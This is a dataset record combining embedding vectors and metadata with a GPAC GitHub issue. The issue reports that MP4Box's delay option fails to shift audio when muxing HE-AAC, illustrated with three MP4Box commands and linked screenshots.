0.0005010197055526078, -0.013211285695433617, -0.00036044104490429163, -0.016757510602474213, 0.008840687572956085, 0.013069151900708675, -0.004654863849282265, 0.011669139377772808, 0.0035320112947374582, -0.002851548371836543, 0.01254325918853283, 0.0245890524238348, 0.012443765997886658, -0.0024056052789092064, 0.012017366476356983, -0.010297553613781929, -0.012529045343399048, 0.0002935939992312342, -0.003391654696315527, -0.0295068621635437, 0.013289458118379116, -0.02647942304611206, 0.009409220889210701, 0.007703621871769428, 0.01316153910011053, 0.01250772550702095, -0.005937616340816021, 0.007668088655918837, 0.002663221675902605, -0.005084816832095385, 0.019301695749163628, 0.007859968580305576, -0.012941231951117516, -0.0010837659938260913, -0.011434619314968586, -0.006353355944156647, -0.018235696479678154, -0.015080337412655354, 0.04684711992740631, 0.00001518493900221074, 0.013545298017561436, 0.0004850297118537128, 0.006971635855734348, 0.006271629594266415, -0.008677234873175621, -0.0027254049200564623, 0.00979298073798418, 0.023409346118569374, -0.019898654893040657, -0.005859442986547947, 0.011150353588163853, 0.00023429776774719357, -0.01742553524672985, -0.0064421892166137695, -0.015208257362246513, -0.013907738029956818, 0.00396551750600338, -0.025029664859175682, 0.007717835251241922, 0.008137128315865993, 0.015037697739899158, -0.009423433803021908, 0.002903071464970708, 0.000629827962256968, 0.015023483894765377, -0.001818417222239077, 0.004882276989519596, -0.009103634394705296, 0.02717587724328041, 0.0018992555560544133, -0.005617816466838121, -0.005713756661862135, 0.007266562432050705, -0.0001746684283716604, 0.001415114151313901, 0.015762576833367348, -0.013687431812286377, 0.005397510249167681, 0.0009318611118942499, 0.019131135195493698, -0.01362347137182951, 0.009238661266863346, 0.010091460309922695, -0.0031908913515508175, -0.010325980372726917, 0.0032548513263463974, 0.014909777790307999, 0.012266099452972412, -0.0037309976760298014, 0.0156062301248312, 0.004544710740447044, 0.003947751130908728, -0.023181932047009468, 0.025285504758358, 0.005532536655664444, 0.0010491210268810391, -0.0026205817703157663, -0.0022599187213927507, -0.0019276821985840797, -0.023778893053531647, -0.003976177424192429, 0.010603140108287334, -0.02267025224864483, -0.00840718112885952, 0.005468576680868864, 0.04684711992740631, -0.005706649739295244, 0.026152517646551132, 0.009160487912595272, -0.015719937160611153, -0.00944475457072258, -0.0019152455497533083, 0.0013085141545161605, -0.0006902345921844244, -0.008840687572956085, -0.015378816984593868, 0.006250309757888317, 0.013360525481402874, -0.0034271879121661186, -0.0012285643024370074, 0.003951304126530886, -0.011249846778810024, -0.013296565040946007, -0.007270115427672863, -0.02018292061984539, 0.00927419401705265, -0.015918923541903496, 0.006104622967541218, 0.015279323793947697, 0.007774688769131899, 0.012138179503381252, -0.0027627150993794203, -0.018136201426386833, -0.011463046073913574, -0.0010340193985030055, 0.010212273336946964, 0.0009003253071568906, -0.0018130872631445527, 0.015492524020373821, 0.003926430828869343, -0.009508714079856873, -0.0017455739434808493, 0.006200562696903944, 0.0010997559875249863, 0.007796008605509996, -0.006200562696903944, -0.006061982829123735, -0.01078791357576847, 0.007760475389659405, -0.007703621871769428, -0.012017366476356983, -0.006651835981756449, 0.0010864309733733535, -0.002631241688504815, -0.012600112706422806, -0.00019732091459445655, 0.00827926117926836, -0.015492524020373821, -0.013900631107389927, 0.0016105473041534424, 0.02269867993891239, 0.007952354848384857, 0.01871894858777523, -0.011313806287944317, -0.003652824554592371, 0.006452849600464106, 0.008115808479487896, -0.008613274432718754, 0.0230397991836071, -0.028753556311130524, 0.015421457588672638, -0.0030238847248256207, -0.0021462119184434414, 0.012180819176137447, -0.013929057866334915, 0.026934251189231873, -0.005575176794081926, 0.01026912685483694, 0.00880515482276678, 0.05341367423534393, -0.027488570660352707, -0.006790415849536657, 0.014582871459424496, 0.012834631837904453, -0.015066124498844147, 0.00042173598194494843, 0.00012869721103925258, -0.007987888529896736, 0.026010384783148766, 0.01682857610285282, 0.015592017211019993, 0.02232913300395012, -0.004708163905888796, 0.0030878446996212006, 0.025484491139650345, 0.0207940936088562, 0.0054756831377744675, -0.0013173975748941302, -0.01810777559876442, 0.006172136403620243, -0.006911229342222214, -0.004132524132728577, -0.01031176745891571, 0.0036350577138364315, 0.0026845417451113462, 0.0022918987087905407, 0.008307687938213348, 0.0006249421276152134, 0.015080337412655354, -0.010361514054238796, -0.004310190677642822, -0.011100606992840767, 0.01732604205608368, -0.018150415271520615, 0.00483253039419651, -0.012237672694027424, 0.01914534904062748, 0.010844767093658447, 0.006346249487251043, 0.01263564545661211, -0.03146830201148987, -0.00396551750600338, 0.029620569199323654, 0.0021355520002543926, -0.01375139132142067, 0.001426662434823811, 0.01628847047686577, 0.020993079990148544, 0.007746262010186911, -0.004644203931093216, 0.019458040595054626, -0.0014009007718414068, -0.015933137387037277, 0.012529045343399048, 0.0343109667301178, -0.0048218704760074615, 0.01594734936952591, -0.021618466824293137, 0.015762576833367348, -0.03197998180985451, -0.02139105275273323, 0.01604684442281723 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
using "M4Box - GPAC version 1.1.0-DEV-rev1382-g08e1f404e-ab-suite": with: no_delay: ``` MP4Box -add "E:\Output\testing\video.m4v"#video:fps=25 -add "E:\Output\testing\audio.aac"#audio -mpeg4 -tmp "E:\Temp" -new "E:\Output\testing\no_delay.mp4" ``` https://ibb.co/SQYz0DQ 40ms_delay: ``` MP4Box -add "E:\Output\testing\video.m4v"#video:fps=25:delay=40 -add "E:\Output\testing\audio.aac"#audio -mpeg4 -tmp "E:\Temp" -new "E:\Output\testing\delay_40.mp4" ``` https://ibb.co/Xy3K0jg 80ms_delay: ``` MP4Box -add "E:\Output\testing\video.m4v"#video:fps=25:delay=80 -add "E:\Output\testing\audio.aac"#audio -mpeg4 -tmp "E:\Temp" -new "E:\Output\testing\delay_80.mp4" ``` https://ibb.co/Q89Pymn Original: https://ibb.co/hZw3bpx -> setting "delay" does not change the audio delay when he-aac is used. uploaded the files to: https://drive.google.com/drive/folders/1X4xxJ5h8I6Ed00yc8sTIfJmDG-DnSpXL
he-aac muxing broken,..
https://api.github.com/repos/gpac/gpac/issues/1935/comments
4
2021-10-16T05:06:07
2021-10-25T10:08:37Z
https://github.com/gpac/gpac/issues/1935
1,027,955,281
1,935
false
This is a GitHub Issue repo:gpac owner:gpac Title : he-aac muxing broken,.. Issue date: --- start body --- using "M4Box - GPAC version 1.1.0-DEV-rev1382-g08e1f404e-ab-suite": with: no_delay: ``` MP4Box -add "E:\Output\testing\video.m4v"#video:fps=25 -add "E:\Output\testing\audio.aac"#audio -mpeg4 -tmp "E:\Temp" -new "E:\Output\testing\no_delay.mp4" ``` https://ibb.co/SQYz0DQ 40ms_delay: ``` MP4Box -add "E:\Output\testing\video.m4v"#video:fps=25:delay=40 -add "E:\Output\testing\audio.aac"#audio -mpeg4 -tmp "E:\Temp" -new "E:\Output\testing\delay_40.mp4" ``` https://ibb.co/Xy3K0jg 80ms_delay: ``` MP4Box -add "E:\Output\testing\video.m4v"#video:fps=25:delay=80 -add "E:\Output\testing\audio.aac"#audio -mpeg4 -tmp "E:\Temp" -new "E:\Output\testing\delay_80.mp4" ``` https://ibb.co/Q89Pymn Original: https://ibb.co/hZw3bpx -> setting "delay" does not change the audio delay when he-aac is used. uploaded the files to: https://drive.google.com/drive/folders/1X4xxJ5h8I6Ed00yc8sTIfJmDG-DnSpXL --- end body ---
1,045
[ -0.03403019160032272, 0.03229616954922676, -0.01487079169601202, 0.027883701026439667, -0.016333872452378273, 0.02179913967847824, -0.023904738947749138, 0.03344186395406723, -0.010961499065160751, 0.01803692989051342, -0.008120489306747913, 0.011565310880541801, -0.012540698982775211, 0.015226885676383972, -0.017711801454424858, -0.008492065593600273, -0.013121286407113075, 0.02322351559996605, 0.008492065593600273, 0.003597709583118558, 0.024740785360336304, -0.051587171852588654, -0.0038318801671266556, 0.04037795215845108, -0.01871815323829651, 0.004764691460877657, -0.021504975855350494, 0.016906719654798508, -0.010380911640822887, -0.008151453919708729, -0.0033867626916617155, 0.031800735741853714, -0.03161494806408882, 0.003874456509947777, 0.06490198522806168, 0.02193848229944706, 0.05347601696848869, 0.04090435430407524, -0.004404726903885603, -0.014514697715640068, -0.03858200088143349, -0.0064600082114338875, -0.06576899439096451, 0.008569477126002312, -0.015250109136104584, 0.007888254709541798, 0.0019072312861680984, 0.02960224077105522, -0.02893650159239769, -0.026273537427186966, 0.022557774558663368, -0.018826529383659363, -0.03910839930176735, -0.023254480212926865, -0.0224184338003397, -0.007067690137773752, 0.03808656707406044, 0.016473213210701942, -0.003030668944120407, 0.023657022044062614, -0.022031376138329506, 0.008461100980639458, -0.0012598757166415453, 0.03882971778512001, -0.011696910485625267, -0.014344391413033009, -0.028549442067742348, 0.029029395431280136, -0.016380319371819496, 0.03189362958073616, 0.017665354534983635, -0.04053277522325516, 0.005620090756565332, 0.03282256796956062, 0.04257644712924957, -0.07190000265836716, 0.024787232279777527, 0.04409371688961983, -0.009986111894249916, 0.020034153014421463, -0.06490198522806168, 0.01749504916369915, -0.06706951558589935, 0.015993261709809303, -0.00104312296025455, 0.013748321682214737, -0.04477493837475777, -0.06366340070962906, -0.016782861202955246, -0.001985610695555806, -0.007048337254673243, -0.010280276648700237, 0.021443046629428864, -0.020699894055724144, -0.0020359281916171312, 0.010582182556390762, -0.00104312296025455, 0.010117711499333382, -0.04743790253996849, -0.049636393785476685, -0.022526809945702553, -0.03291546180844307, -0.023873774334788322, 0.009630017913877964, 0.019770953804254532, 0.00848432444036007, 0.013508345000445843, -0.01298968680202961, 0.005914255511015654, 0.11252567917108536, 0.01898135431110859, -0.0019430341199040413, 0.00590651435777545, -0.015435896813869476, 0.007845677435398102, -0.010156417265534401, -0.025220738723874092, -0.03173880651593208, -0.019863847643136978, 0.029973817989230156, 0.006614831276237965, 0.02107146941125393, -0.03796270862221718, 0.026428360491991043, -0.012927757576107979, 0.047685619443655014, -0.021319188177585602, 0.0033557980787009, -0.015683613717556, -0.023440267890691757, -0.0472521148622036, 0.018687188625335693, -0.0023029986768960953, -0.014847568236291409, -0.0019739989656955004, -0.008623665198683739, -0.02712506614625454, 0.022186199203133583, 0.01608615554869175, -0.01140274666249752, -0.033348970115184784, -0.04174039885401726, 0.06762687861919403, -0.041492681950330734, -0.022573256865143776, -0.014847568236291409, 0.009103618562221527, 0.02073085866868496, -0.01992577686905861, 0.02435372769832611, -0.01958516426384449, -0.03687894344329834, 0.021721728146076202, 0.018408507108688354, 0.04186425730586052, 0.0009347465238533914, 0.01120921690016985, -0.022170716896653175, 0.0011553699150681496, 0.01399603858590126, -0.0134231923148036, -0.020607000216841698, 0.013965073972940445, 0.004749209154397249, -0.01696864888072014, -0.01288905180990696, -0.006758043076843023, 0.006560643203556538, -0.0013498668558895588, 0.025468455627560616, -0.02933904156088829, 0.0004202004929538816, -0.004923385567963123, 0.0033074156381189823, -0.061062365770339966, 0.004509232472628355, 0.018625259399414062, 0.021241776645183563, -0.006986407563090324, 0.02907584235072136, -0.02536007948219776, 0.01379476860165596, 0.01127114612609148, 0.021365635097026825, 0.023920221254229546, -0.04542519897222519, 0.018671706318855286, -0.036228686571121216, 0.020963093265891075, -0.03042280673980713, 0.021210812032222748, 0.025468455627560616, 0.02690831385552883, -0.015041097067296505, 0.016720931977033615, -0.029911888763308525, -0.019027801230549812, -0.015373967587947845, -0.0026900572702288628, 0.00005013618283555843, 0.005550420377403498, -0.011418228968977928, -0.004079597536474466, -0.033132217824459076, -0.046663783490657806, -0.004520844668149948, -0.004880808759480715, 0.05189681798219681, -0.017727283760905266, 0.005519455764442682, -0.026892831549048424, -0.02388925664126873, 0.03793174400925636, 0.006231643259525299, 0.018532365560531616, 0.016720931977033615, -0.01757246069610119, 0.013787027448415756, -0.00762118399143219, -0.0038492977619171143, 0.01422827411442995, -0.017278295010328293, 0.006320666987448931, 0.006587737239897251, -0.05000796914100647, 0.003187427530065179, 0.0012947110226377845, -0.020916646346449852, 0.015838438645005226, 0.018950389698147774, 0.026768973097205162, 0.0009482935420237482, -0.015149473212659359, 0.016705449670553207, -0.013926368206739426, 0.009506159462034702, -0.026629632338881493, -0.005492361728101969, 0.002639739541336894, 0.011480158194899559, -0.048552632331848145, 0.050782088190317154, -0.010752487927675247, -0.025793585926294327, -0.021489493548870087, 0.04164750501513481, 0.023858292028307915, -0.00275779259391129, -0.032141346484422684, -0.019801918417215347, 0.026753490790724754, 0.022728081792593002, -0.020467659458518028, 0.012501992285251617, -0.030856311321258545, 0.05347601696848869, 0.019817400723695755, -0.014336650259792805, -0.010806676000356674, -0.0500699020922184, -0.0073386309668421745, 0.025422008708119392, -0.02745019644498825, -0.03128981590270996, -0.022248128429055214, -0.032605815678834915, -0.010783452540636063, 0.012997427955269814, -0.006382596213370562, -0.0111085819080472, -0.009606794454157352, 0.016163567081093788, -0.04678764194250107, 0.0034022449981421232, 0.016163567081093788, -0.0017369254492223263, -0.013338039629161358, -0.0008142745355144143, 0.035980965942144394, -0.0016033902065828443, -0.024245351552963257, 0.03548553213477135, 0.033534757792949677, 0.01682930812239647, 0.024678856134414673, 0.018609777092933655, 0.04059470444917679, -0.026072267442941666, -0.03607385978102684, 0.015211403369903564, 0.02322351559996605, 0.007605701684951782, -0.00774117186665535, 0.0073966896161437035, 0.010442840866744518, 0.002918421756476164, -0.014096674509346485, 0.012532957829535007, 0.03746727108955383, 0.003044215962290764, -0.005422690883278847, 0.027016690000891685, 0.017618907615542412, -0.014878532849252224, -0.0333799347281456, -0.0005655894055962563, -0.026025820523500443, 0.02457047998905182, -0.022867422550916672, -0.013430933468043804, 0.022371986880898476, -0.019739989191293716, -0.02571617253124714, 0.02145852893590927, -0.020607000216841698, 0.006436784286051989, -0.016457730904221535, -0.015327520668506622, -0.025747137144207954, 0.0017001548549160361, 0.007981148548424244, 0.0077527835965156555, -0.06768880784511566, 0.014274721033871174, -0.0007300892611965537, -0.016798343509435654, -0.00691673718392849, -0.003978962544351816, -0.027078619226813316, 0.028487512841820717, -0.018408507108688354, 0.0016208079177886248, 0.0134231923148036, -0.012811639346182346, 0.01950775273144245, -0.05685116723179817, -0.024322763085365295, -0.0036538331769406796, 0.01843947172164917, -0.02557683177292347, -0.01952323503792286, 0.0006110687390901148, 0.005306573584675789, -0.005372373387217522, 0.011007946915924549, -0.02376539818942547, -0.009335853159427643, -0.0005254320567473769, 0.031367227435112, 0.016395801678299904, 0.0009255538461729884, 0.003411921439692378, 0.015126249752938747, 0.03526877984404564, 0.0030577629804611206, -0.019739989191293716, 0.004934997297823429, 0.010148676112294197, 0.00821338314563036, 0.004772432614117861, 0.015211403369903564, -0.04328863322734833, 0.02765146642923355, 0.015900367870926857, -0.0014863050309941173, 0.01655062660574913, -0.03183170035481453, -0.009924182668328285, -0.027914665639400482, -0.014104415662586689, 0.003978962544351816, 0.007121878210455179, -0.04669474810361862, 0.017138954252004623, -0.017603425309062004, -0.0007707304321229458, -0.007613442838191986, 0.006429043132811785, 0.006115525960922241, 0.016395801678299904, -0.04960542917251587, 0.03127433359622955, 0.05753238871693611, -0.05846133083105087, 0.0024462102446705103, 0.010024817660450935, -0.007566995453089476, 0.012478768825531006, -0.03062407672405243, -0.020281869918107986, -0.026335466653108597, 0.030469253659248352, -0.03629061579704285, -0.022108787670731544, -0.04096628352999687, 0.024384692311286926, -0.03122788853943348, -0.022975798696279526, -0.009575829841196537, -0.016736414283514023, 0.019275518134236336, -0.01950775273144245, 0.022449398413300514, 0.024183420464396477, -0.0305621474981308, 0.05579836666584015, -0.0236260574311018, -0.017278295010328293, 0.024849161505699158, -0.0020146400202065706, 0.011588534340262413, 0.022851940244436264, -0.0014495344366878271, -0.05294961482286453, -0.02145852893590927, -0.0026261925231665373, -0.010651852935552597, 0.022991281002759933, -0.04050181061029434, 0.021551422774791718, -0.0023455750197172165, -0.01005578227341175, 0.00877848919481039, -0.023873774334788322, 0.03836524859070778, 0.027574054896831512, -0.018547847867012024, 0.007884383201599121, 0.031661394983530045, -0.031181441619992256, 0.024818196892738342, -0.03601193055510521, 0.021690763533115387, -0.04427950456738472, 0.0143289091065526, 0.019414858892560005, -0.02981899492442608, -0.039665766060352325, -0.03560939058661461, 0.000017720027244649827, -0.0034235334023833275, 0.029091324657201767, 0.020235422998666763, -0.003044215962290764, 0.006657408084720373, -0.061341047286987305, -0.019414858892560005, -0.0028042395133525133, -0.00526399677619338, -0.005500102881342173, -0.005767173133790493, 0.03997541218996048, 0.006150361150503159, -0.01530429720878601, -0.01281938049942255, -0.00227203406393528, 0.005581384990364313, -0.0113098518922925, 0.016782861202955246, -0.004547938704490662, -0.01836206018924713, 0.04009927064180374, 0.0309646874666214, -0.030298946425318718, 0.058987729251384735, -0.007895995862782001, -0.03248195722699165, -0.007497325073927641, 0.005186585243791342, -0.00294358073733747, -0.011425970122218132, -0.015319779515266418, -0.025406526401638985, 0.004865326453000307, -0.013121286407113075, 0.046601854264736176, -0.015188178978860378, -0.055829331278800964, -0.014886274002492428, -0.011511122807860374, -0.011743358336389065, -0.012912275269627571, 0.038520071655511856, 0.01655062660574913, -0.01998770609498024, -0.010241570882499218, -0.007025113794952631, -0.005813620053231716, -0.0286578182131052, 0.02139659970998764, 0.010357688181102276, 0.0120142986997962, 0.0345875546336174, 0.0005505908629857004, 0.027233442291617393, 0.0026223219465464354, 0.014545662328600883, -0.024013115093111992, 0.03975865989923477, 0.0005563967279158533, -0.012834862805902958, -0.020483141764998436, 0.004578903317451477, -0.0014117961982265115, 0.030376357957720757, -0.0460444912314415, -0.015977779403328896, 0.024880126118659973, -0.033008355647325516, 0.013864438980817795, -0.020096082240343094, -0.0068741608411073685, -0.000347143184626475, -0.015675872564315796, -0.013949591666460037, -0.0015917784767225385, -0.005991667043417692, 0.010620888322591782, 0.016504177823662758, -0.0012260080548003316, -0.009699688293039799, -0.02469433844089508, 0.009374558925628662, 0.030531182885169983, -0.00989321805536747, -0.0014475991483777761, 0.016163567081093788, 0.017061542719602585, 0.01661255583167076, -0.018485918641090393, -0.04948157072067261, -0.03486623987555504, 0.0014282462652772665, 0.029648689553141594, -0.018253684043884277, -0.0004552776808850467, -0.0240285973995924, 0.04477493837475777, 0.00516336178407073, -0.00046616370673291385, -0.040223129093647, 0.024462103843688965, -0.04910999536514282, 0.013848956674337387, -0.03325607627630234, 0.011882699094712734, 0.010156417265534401, -0.009366817772388458, -0.019027801230549812, -0.008832677267491817, 0.019414858892560005, -0.017448602244257927, -0.00009682512609288096, 0.03793174400925636, -0.006103914231061935, 0.017603425309062004, 0.021303705871105194, 0.01655062660574913, 0.004857585299760103, 0.014824344776570797, -0.0025139455683529377, 0.009242959320545197, 0.018625259399414062, -0.007760524749755859, 0.015428155660629272, 0.009498418308794498, 0.011449193581938744, 0.012687780894339085, -0.02052958868443966, -0.007447007577866316, 0.0027926277834922075, -0.024802714586257935, 0.04031602293252945, -0.0004523747484199703, -0.00427312683314085, 0.013848956674337387, 0.026335466653108597, -0.02045217715203762, -0.015528790652751923, -0.017711801454424858, 0.029153253883123398, -0.015226885676383972, -0.007129619363695383, -0.012827121652662754, 0.02698572538793087, -0.020080599933862686, -0.00042237769230268896, -0.009413264691829681, -0.0577181801199913, 0.0045556798577308655, -0.0069786664098501205, 0.0073966896161437035, -0.016194531694054604, -0.02147401124238968, 0.04988411068916321, -0.029896406456828117, -0.016674485057592392, 0.009134583175182343, 0.02941645309329033, 0.008863641880452633, -0.030500218272209167, 0.04960542917251587, -0.018532365560531616, -0.026799937710165977, -0.03344186395406723, 0.008933312259614468, 0.023672504350543022, 0.00590651435777545, -0.03694087266921997, 0.008135971613228321, 0.0065103257074952126, 0.02099405787885189, 0.04641606658697128, 0.0053259264677762985, -0.0026552220806479454, 0.02873522974550724, 0.016395801678299904, 0.01586940325796604, -0.011100840754806995, 0.010396393947303295, 0.018547847867012024, -0.02165979892015457, 0.023192550987005234, -0.019879329949617386, 0.020560553297400475, 0.035021062940359116, -0.009637759067118168, -0.010357688181102276, -0.005883290898054838, -0.015691354870796204, -0.036847978830337524, -0.0025294278748333454, -0.02207782305777073, -0.03703376650810242, 0.00928940623998642, -0.0026203866582363844, 0.010651852935552597, -0.01530429720878601, -0.011147287674248219, -0.008608182892203331, -0.012331686913967133, 0.001613066764548421, -0.03889164701104164, 0.022511327639222145, -0.02839461900293827, 0.016271943226456642, -0.005221420433372259, -0.00801211316138506, -0.013879921287298203, 0.020204458385705948, -0.042421624064445496, -0.04359827935695648, 0.015977779403328896, 0.024988502264022827, 0.04013023525476456, -0.0357951782643795, 0.017944036051630974, 0.014445027336478233, -0.02388925664126873, -0.032605815678834915, -0.02004963532090187, -0.023068692535161972, -0.008182418532669544, -0.02650577202439308, 0.014661779627203941, 0.016860272735357285, -0.005233032163232565, -0.010783452540636063, -0.02861137129366398, 0.004950479604303837, 0.007447007577866316, -0.026397395879030228, 0.04530133679509163, -0.005964573007076979, 0.001451469724997878, -0.01089956983923912, -0.01797500066459179, -0.00580200832337141, -0.019941259175539017, -0.0033848274033516645, 0.004420209210366011, -0.0201115645468235, -0.02517429180443287, 0.02119532972574234, -0.023300927132368088, 0.012130416929721832, -0.00199335184879601, -0.010404135100543499, 0.02645932510495186, -0.04728307947516441, 0.041957151144742966, 0.019476788118481636, 0.0003868166822940111, 0.01564490795135498, -0.03269870951771736, 0.0063361492939293385, 0.005198196973651648, 0.005577514413744211, 0.0056897616013884544, -0.025483937934041023, -0.015474602580070496, 0.003915097564458847, 0.004892420489341021, -0.007659889757633209, -0.03904647007584572, 0.02045217715203762, 0.0024733045138418674, -0.02470982074737549, -0.002452016109600663, -0.011789805255830288, -0.0036131921224296093, -0.0013411580584943295, -0.008027595467865467, 0.0023378338664770126, -0.0046640560030937195, -0.00976161751896143, -0.0092507004737854, -0.0010237699607387185, -0.027481161057949066, -0.006490972824394703, -0.015211403369903564, -0.023037727922201157, -0.0011960110859945416, -0.0027132807299494743, 0.021969446912407875, 0.04672571271657944, 0.0341850146651268, 0.027775324881076813, -0.0061542317271232605, 0.014414061792194843, -0.039139363914728165, -0.010860864073038101, 0.021412082016468048, 0.0254374910145998, -0.022093305364251137, 0.0007494422025047243, -0.018284648656845093, 0.019894812256097794, 0.026350948959589005, 0.028177866712212563, -0.011472417041659355, 0.011201475746929646, -0.00976161751896143, -0.014878532849252224, -0.0180988609790802, -0.024740785360336304, -0.00013873631542082876, -0.02240295149385929, -0.019151659682393074, -0.003510621376335621, 0.014081192202866077, 0.0028932630084455013, 0.007493454497307539, -0.027543090283870697, -0.01741763763129711, 0.020405730232596397, 0.012409098446369171, -0.027682431042194366, 0.00726896058768034, -0.012037522159516811, -0.003605450736358762, -0.0020107694435864687, 0.006680631544440985, -0.017711801454424858, 0.010164158418774605, -0.01749504916369915, -0.003034539520740509, -0.018253684043884277, 0.011371782049536705, -0.0011079552350565791, -0.0035764214117079973, 0.0037467272486537695, -0.03412308543920517, -0.010148676112294197, 0.04136882349848747, -0.013910885900259018, -0.03706473112106323, 0.004764691460877657, 0.013446415774524212, 0.0041221738792955875, -0.03344186395406723, -0.002953257178887725, -0.05304250866174698, 0.024725303053855896, 0.006096173077821732, -0.006665149237960577, 0.008600441738963127, -0.007764395326375961, -0.027806289494037628, -0.0023552514612674713, 0.009002982638776302, -0.0252362210303545, 0.028317207470536232, -0.03359668701887131, 0.005825231783092022, -0.0036654449068009853, 0.0024752398021519184, 0.02650577202439308, 0.012509734369814396, -0.0036151274107396603, -0.019879329949617386, 0.026227090507745743, -0.0033035450614988804, -0.041554611176252365, -0.025143327191472054, -0.01661255583167076, -0.00962227676063776, 0.01655062660574913, -0.02517429180443287, 0.04285512864589691, -0.024059562012553215, -0.014561144635081291, 0.043040916323661804, -0.008972018025815487, -0.00598779646679759, 0.010048041120171547, 0.011836252175271511, -0.018749117851257324, -0.019352929666638374, 0.027914665639400482, -0.03944901376962662, 0.016132602468132973, 0.011627240106463432, -0.01898135431110859, 0.029493864625692368, -0.059111587703228, -0.019260035827755928, 0.0020862459205091, 0.020607000216841698, -0.0017533753998577595, 0.011743358336389065, -0.012695522047579288, -0.029726101085543633, 0.0005288188112899661, -0.023796362802386284, 0.031460121273994446, -0.003506750799715519, -0.0012172992574051023, -0.036971837282180786, 0.022449398413300514, -0.022108787670731544, 0.0020281870383769274, -0.03520685061812401, -0.016860272735357285, -0.0024326632265001535, -0.01944582350552082, -0.009599053300917149, -0.03412308543920517, -0.012966463342308998, -0.000783309864345938, 0.015652649104595184, 0.03904647007584572, 0.028828123584389687, 0.02469433844089508, 0.016674485057592392, 0.02415245585143566, -0.0325748510658741, 0.004513103049248457, 0.029586758464574814, -0.015211403369903564, 0.029029395431280136, 0.011720133945345879, -0.00018530430679675192, -0.016999613493680954, 0.017820177599787712, -0.016333872452378273, 0.005949090700596571, -0.053599875420331955, -0.006649666931480169, 0.022124269977211952, -0.03793174400925636, -0.011936887167394161, -0.003717697924003005, -0.01661255583167076, -0.024384692311286926, -0.005883290898054838, -0.011983334086835384, -0.005473008379340172, -0.0019256165251135826, 0.008035336621105671, 0.005550420377403498, 0.014770155772566795, -0.015528790652751923, 0.005476878955960274, 0.04827394708991051, -0.012316204607486725, -0.014081192202866077, -0.018950389698147774, -0.029153253883123398, 0.0019759342540055513, 0.00901846494525671, -0.01763438992202282, -0.026490289717912674, -0.015660390257835388, 0.017061542719602585, 0.03211038187146187, -0.019832883030176163, -0.04313381016254425, 0.007447007577866316, -0.018021447584033012, -0.009095877408981323, -0.0040718563832342625, 0.0020339929033070803, -0.01332255732268095, -0.019151659682393074, -0.010419617407023907, 0.01154208742082119, 0.010233829729259014, -0.026567703112959862, 0.0076405368745327, -0.008468842133879662, -0.002579745603725314, -0.010001594200730324, -0.022697115316987038, -0.01642676629126072, -0.04294802248477936, -0.016999613493680954, -0.0029319687746465206, 0.016302907839417458, 0.041616540402173996, -0.010613147169351578, -0.00013389808009378612, -0.010543475858867168, 0.04170943424105644, 0.0007300892611965537, -0.00999385304749012, -0.010752487927675247, -0.014313426800072193, 0.017262812703847885, 0.0004160880052950233, 0.0072341253980994225, -0.006533549167215824, 0.018950389698147774, 0.02066892944276333, 0.0032300041057169437, -0.008352724835276604, -0.021443046629428864, -0.02570069022476673, 0.001809498993679881, -0.025127844884991646, -0.00011738761531887576, 0.04019216448068619, -0.015466861426830292, -0.01695316657423973, 0.0020959223620593548, 0.04031602293252945, -0.019291000440716743, -0.004056374076753855, -0.017711801454424858, -0.04818105325102806, 0.010233829729259014, -0.0003302093537058681, -0.027032172307372093, -0.03245099261403084, -0.018253684043884277, 0.033132217824459076, -0.02531363256275654, 0.0003979446191806346, 0.0015250109136104584, 0.007474101614207029, -0.011364040896296501, 0.015141732059419155, 0.0009516803547739983, 0.0020688283257186413, -0.025452973321080208, 0.014708226546645164, -0.02322351559996605, 0.0019111018627882004, -0.02300676330924034, -0.015528790652751923, -0.002868104260414839, -0.024849161505699158, -0.011828511022031307, 0.0321723110973835, 0.007493454497307539, 0.022248128429055214, -0.0002109469351125881, -0.03464948758482933, -0.007563124876469374, -0.014685003086924553, -0.023254480212926865, -0.031042098999023438, 0.026165161281824112, -0.010775711387395859, 0.012563922442495823, -0.006758043076843023, 0.000590264389757067, 0.00223913392983377, -0.0025216867215931416, 0.012471027672290802, 0.009978370741009712, -0.013585756532847881, 0.020885681733489037, -0.03344186395406723, 0.02921518310904503, -0.015962297096848488, 0.02288290485739708, -0.016163567081093788, -0.016117120161652565, -0.004489879589527845, -0.03169235959649086, -0.008197900839149952, -0.014847568236291409, 0.007156713400036097, -0.006796748843044043, 0.00022413111582864076, 0.0037912388797849417, 0.015219144523143768, -0.01561394426971674, 0.0309646874666214, -0.01783565990626812, -0.031073063611984253, 0.021025022491812706, -0.012765192426741123, -0.018625259399414062, 0.015629425644874573, -0.02153594046831131, 0.019972223788499832, 0.025251703336834908, 0.03842717781662941, -0.004083468113094568, 0.005066596902906895, 0.025081397965550423, 0.01600874401628971, 0.021381117403507233, 0.014762414619326591, 0.009119100868701935, 0.003502880223095417, 0.021102434024214745, 0.03122788853943348, -0.009529382921755314, 0.007474101614207029, 0.0032512922771275043, 0.007810842711478472, -0.007733430713415146, -0.016117120161652565, 0.01614808477461338, -0.012803898192942142, -0.02006511762738228, 0.006661278661340475, 0.019941259175539017, -0.0055620321072638035, -0.04523940756917, -0.02093212865293026, -0.01816079020500183, -0.018315613269805908, 0.010357688181102276, 0.0370028018951416, 0.02125725895166397, -0.005120785441249609, 0.017448602244257927, -0.006630313582718372, 0.050100866705179214, -0.016798343509435654, -0.00024674987071193755, -0.007199289742857218, -0.012610369361937046, -0.014491474255919456, 0.031862664967775345, 0.0014630814548581839, -0.009335853159427643, -0.026350948959589005, 0.020343799144029617, -0.0166899673640728, -0.03904647007584572, -0.036631226539611816, 0.0004618092789314687, 0.010249312035739422, -0.013585756532847881, 0.003278386313468218, 0.008995241485536098, 0.004547938704490662, -0.01582295633852482, 0.0050240205600857735, 0.0066922432743012905, -0.007919219322502613, 0.013020651414990425, -0.02457047998905182, -0.006103914231061935, -0.012409098446369171, -0.008414654061198235, -0.02994285337626934, 0.009978370741009712, 0.005968443583697081, -0.04331959784030914, -0.0014621138107031584, -0.0038280095905065536, -0.021922998130321503, 0.01248650997877121, -0.02073085866868496, -0.012169122695922852, -0.0063322787173092365, -0.0048459735698997974, -0.022650668397545815, -0.021783657371997833, 0.00464470311999321, 0.029633207246661186, 0.08571025729179382, 0.042297761887311935, -0.0024500808212906122, -0.0028777807019650936, -0.019817400723695755, -0.006947701796889305, 0.003094533458352089, 0.028518477454781532, 0.004749209154397249, 0.016271943226456642, 0.018331095576286316, -0.015683613717556, 0.00972291175276041, 0.006684502121061087, -0.006111655384302139, 0.0049001616425812244, 0.008236606605350971, 0.004776303190737963, 0.007334760390222073, 